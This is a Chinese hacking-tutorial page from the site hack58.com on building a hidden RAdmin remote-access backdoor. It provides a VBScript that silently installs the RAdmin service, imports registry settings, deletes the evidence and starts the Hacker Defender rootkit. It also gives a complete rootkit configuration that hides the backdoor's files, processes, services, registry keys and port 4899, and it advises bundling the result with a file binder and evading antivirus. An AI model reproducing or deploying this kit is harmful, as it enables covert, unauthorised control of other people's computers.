-----------------------------------------------------------------------------------

黑客动画吧 http://www.hack58.com

专业的黑客动画教程网站

免费学习黑客黑客技术

成为黑客不是梦。

打造国内最大的黑客动画网站

注意：所有教程全部对外免费开放

-----------------------------------------------------------------------------------
                              RAdmin制作终极篇
 
   大家好，我是nafish,今天要演示的是RAdmin制作的方法，网上关于RAdmin的教程很多，动画

也很多，我的方法是RAdmin+Hxdef100r（黑客守卫者），这样就可以把RAdmin的服务，进程，端

口，注册表全部隐藏起来！关于文件的免杀，因为我的机子没装杀软，不做测试。大家自行免杀

我只是把制作的流程给大家演示一下。

1.安装RAdmin，导出安装文件和配置文件

安装路径：C:\Program Files\Radmin

密码：12345678

端口：4899

raddrv.dll，r_server.exe，AdmDll.dll需要这3个文件

导注册表

 (1).HKEY_LOCAL_MACHINE\SYSTEM\RAdmin 保存为RAdmin.reg

 (2).HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server 保存为r_server.reg

2.配置hxdef100r

hxdef100.ini。我已经配置好了，大家自己配置！

下面的参数是有效的：
    -:installonly     -     只安装服务，不运行
    -:refresh         -     从INI文件中更新设置
    -:noservice       -     正常运行不安装服务
    -:uninstall       -     移除hxdef删除所有运行的后门连接，同时停止hxdef服务

3.文件打包，加壳压缩

制作脚本文件,保存为radmin.vbs
sub cmd()
Set WshShell=ws cript.CreateObject("Ws cript.Shell")
wshshell.run "%ComSpec% /c r_server /uninstall /silence",0
ws cript.sleep 10000
wshshell.run "%ComSpec% /c regedit /s RAdmin.reg",0
ws cript.sleep 1000
wshshell.run "%ComSpec% /c regedit /s r_server.reg",0
ws cript.sleep 1000
wshshell.run "%ComSpec% /c r_server /install /silence",0
ws cript.sleep 10000
wshshell.run "%ComSpec% /c del /f /q r_server.reg",0
ws cript.sleep 10000
wshshell.run "%ComSpec% /c del /f /q RAdmin.reg",0
ws cript.sleep 10000
wshshell.run "%ComSpec% /c net start r_server",0
ws cript.sleep 10000
wshshell.run "%ComSpec% /c hxdef100.exe -:installonly",0
ws cript.sleep 10000
wshshell.run "%ComSpec% /c net start HackerDefender100",0
ws cript.sleep 10000
set wshshell=nothing
end sub
call cmd()

用捆绑机捆一下！

4.在虚拟机里给大家测试一下，虚拟机慢，大家等一下，没有端口4899，没有服务，没有r_server.exe,

没有C:\Program Files\Radmin文件夹，而且自动删除，完美隐藏！教程完！

                                            by nafish

======================================================================================
hxdef.ini文件内容：
[Hidden Table]
hxdef*
rcmd.exe
AdmDll.dll
r_server.exe
raddrv.dll
RAdmin.vbe
radmin*

[Hidden Processes]
hxdef*
rcmd.exe
r_server.exe

[Root Processes]
hxdef*
rcmd.exe
r_server.exe

[Hidden Services]
HackerDefender*
r_server*
       
[Hidden RegKeys]
HackerDefender100
LEGACY_HACKERDEFENDER100
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100
r_server
LEGACY_r_server

[Hidden Regvalues]
NTAuthEnabled
Parameter
Port
Timeout
EnableLogFile
LogFilePath
FilterIp 
DisableTrayIcon
AutoAllow 
AskUser
EnableEventLog
RAdmin
[Startup Run]

[Free Space]

[Hidden Ports]
TCPI:4899
TCP4899
UDP:

[Settings] 
Password=hack58
BackdoorShell=hxdef?.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service 100
ServiceDes cription=powerful NT rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys